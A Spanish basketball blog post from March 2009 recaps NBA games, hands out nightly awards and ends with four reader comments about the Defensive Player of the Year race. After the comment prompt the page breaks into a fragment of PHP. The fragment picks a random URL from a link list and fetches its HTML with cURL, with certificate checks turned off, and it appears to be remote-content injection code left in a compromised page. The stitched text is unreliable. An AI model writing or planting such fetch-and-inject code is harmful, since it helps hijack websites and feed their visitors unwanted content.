La Crónica (23/03/2009)

24 de March de 2009 por TheDeerHunter

Una única victoria del Oeste en la jornada de anoche y gracias a que se enfrentaban Suns contra Nuggets por lo que tenía que ganar por fuerza alguno de los dos. Lo hicieron los Suns en lo que supone un resultado fundamental para mantener sus esperanzas, aunque viniera un tanto de rebote. Los Nuggets tenían bien controlado el partido hasta que a Nené se le cortocircuitó la cabeza y la usó para golpear a Louis Amundson, con la consiguiente expulsión. A partir de ahí fue bastante sencillo para Shaq y los suyos. Demasiados nervios en los chicos de Karl.

Predominio de choques con equipos de playoff del Este involucrados. Jugaron cas todos y… no falló ninguno.

Orlando acaricia el título de la Southwest tras vencer en el Madison y de paso deja a los Knicks virtualmente fuera tras su 5ª derrota consecutiva. Sensacional partido de Howard y Cortney Lee. Los Celtics por su parte, lograron mantener la ventaja de un partido con su fácil victoria en el Staples… en la casa de los Clippers, queremos decir. Pésimo partido de los locales, donde sólo se salvó Zach Randolph.

En la batalla por la 4ª plaza, jugaron y ganaron los tres involucrados. Decimos tres pues a última hora se viene sumando Philadelphia que está como un tiro y que anoche logró una impresionante victoria en el Rose Garden. A pesar del pésimo partido de Roy el partido llegó a la prórroga. “Los Andrés”+Thaddeus Young marcaron la diferencia sobre un Aldridge bastante forzado, con Blake y Rudy de escuderos.

Por su parte, Dwyane Wade batió anoche su récord personal de anotación en una misma temporada. Lo hizo como él suele hacerlo, dominando todos los aspectos del juego y merendándose sin piedad a los ositos. De poco le va a servir si los Hawks no aflojan y vista su victoria de ayer frente a los Wolves, no parecen tener intención de hacerlo.

Por último, importantísima victoria de Chicago en Washington, que estuvo a punto de irse al garete con un Jamison bestial. Buen partido general de todo el equipo que les deja a las puertas de postemporada.

PREMIOS

MVP: Para Dwight Howard en la victoria en el Madison. 29 ptos, 14 rebotacos, 4 pinchos, 2 asistencias y un robo. Números que parecen la lista de la compra dignos del “superhéroe” con el que se identifica.
Wade estuvo algo más comedido en su lista con 27 ptos, 8 asis, 2 robos, un rebote y un tapón.

Rookie: Bien Rose, bien Rudy, Love, Beasley, Mayo…  y hasta Oden. Pero el premio se lo lleva Cortney Lee con 22 ptos, 2 asist, 3 robos y 3 rebotes.

La sorpresa: Flip Murray sencillamente brutal. 30ptos y 5 asistencias saliendo desde el banquillo. Una de las claves de la gran temporada de Atlanta, sin lugar a dudas.

La decepción: Alguien que no suele fallar nunca, así que más que decepción hablaremos de accidente. Brandon Roy estuvo muy desacertado con 5/18 en tiro de campo.

El mayor esfuerzo en vano: Antawn Jamison estuvo a punto de fastidiarles bien a Chicago. 34ptos y 12 rebotes que, de haber ganado el partido le hubieran dado sin duda nuestro MVP de la jornada.

RAZONES PARA TRASNOCHAR:

Dos partidazos que tendría que ver todo el mundo de no tener que levantarnos mañana:

De aperitivo un Detroit@Chicago a la 1 AM. No es que sea un partido como aquellos que nos ofrecían ambos antaño pero teniendo en cuenta la situación cada día más crítica de los Pistons pensamos que se lo pueden tomar bien en serio.

De principal tenemos un Houston@Utah que bien podría ser un anticipo de primera ronda que huele a clásico. Eso sí… es a las 3:30h por lo que alguno en lugar de trasnochar podrá madrugar para ver un cacho.
Los Rockets llegan en su mejor momento de la temporada, lo mismito que Utah. Sin lugar a dudas será un simulacro de playoff.

A seguir también la actuación de… Kobe Bryant, para recuperar un tanto de camino perdido en la carrera del MVP y también la actuación de Kevin Durant que suele cuajar buenos partidos contra los amarillos. ¿qué más se puede pedir?

LA PREGUNTA DEL DÍA

¿Hay alguna remota posibilidad de que alguien le birle el premio al mejor defensor a Supermán Howard?

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Creo que tanto Rondo como Paul tienen nivel para pelearselo y para mi como siempre Duncan debe aparecer en el quinteto.

      Citar

  2. MagicJohnson32 dice:
    #2

    Yo creo que no. Dwight se lo lleva de calle. Rondo, Paul, Wade, Battier, Artest y demás aspiran al quinteto. Dwight es el DPoY seguro.

      Citar

  3. Txusma dice:
    #3

    Justamente hoy he leido q alguien apostaba por Lebron…

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    este premio ¿es algo más que un trozo de plástico que no pones encima de la chimenea por si se derrite? ¿Es significativo? ¿Mandan más los numeros o los mandamases? ¿Deberían preguntarle al mejor jugador del mundo si lo dejan desierto y se le envían por privado a éle (pero al revés)?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>